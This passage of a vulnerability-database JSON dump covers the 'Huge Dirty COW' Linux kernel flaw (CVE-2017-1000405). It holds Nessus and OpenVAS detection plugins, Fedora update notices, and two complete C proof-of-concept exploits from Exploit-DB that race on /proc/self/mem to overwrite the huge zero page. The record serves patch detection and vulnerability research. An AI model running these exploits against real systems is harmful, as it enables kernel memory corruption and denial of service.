value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173225-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28062366\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-2006=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-2006=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:07", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure"], "id": "UBUNTU_USN-3511-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3511-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105107);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3511-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3511-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.11-azure and / or linux-image-azure\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3511-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.11.0-1016-azure\", pkgver:\"4.11.0-1016.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-azure\", pkgver:\"4.11.0.1016.16\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.11-azure / linux-image-azure\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T19:05:31", "published": "2017-12-04T19:05:31", "id": "FEDORA:3CCDE601B23D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-302.fc27", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T20:15:47", "published": "2017-12-04T20:15:47", "id": "FEDORA:22E2B607603F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.13.16-202.fc26", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-12-01T13:01:22", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page. CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-11-30T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EDB-ID:43199", "href": "https://www.exploit-db.com/exploits/43199/", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n\r\n//\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43199/"}, {"lastseen": "2018-05-24T14:08:25", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2). CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44305", "href": "https://www.exploit-db.com/exploits/44305/", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n\r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n\r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main(void) {\r\n struct args arg;\r\n\r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n\r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44305/"}], "openvas": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873860", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-b0c1f44130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_b0c1f44130_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-b0c1f44130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873860\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:57 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-b0c1f44130\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6LLKSHB3TZCA72UK4KDILWHY4Q4RTGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", 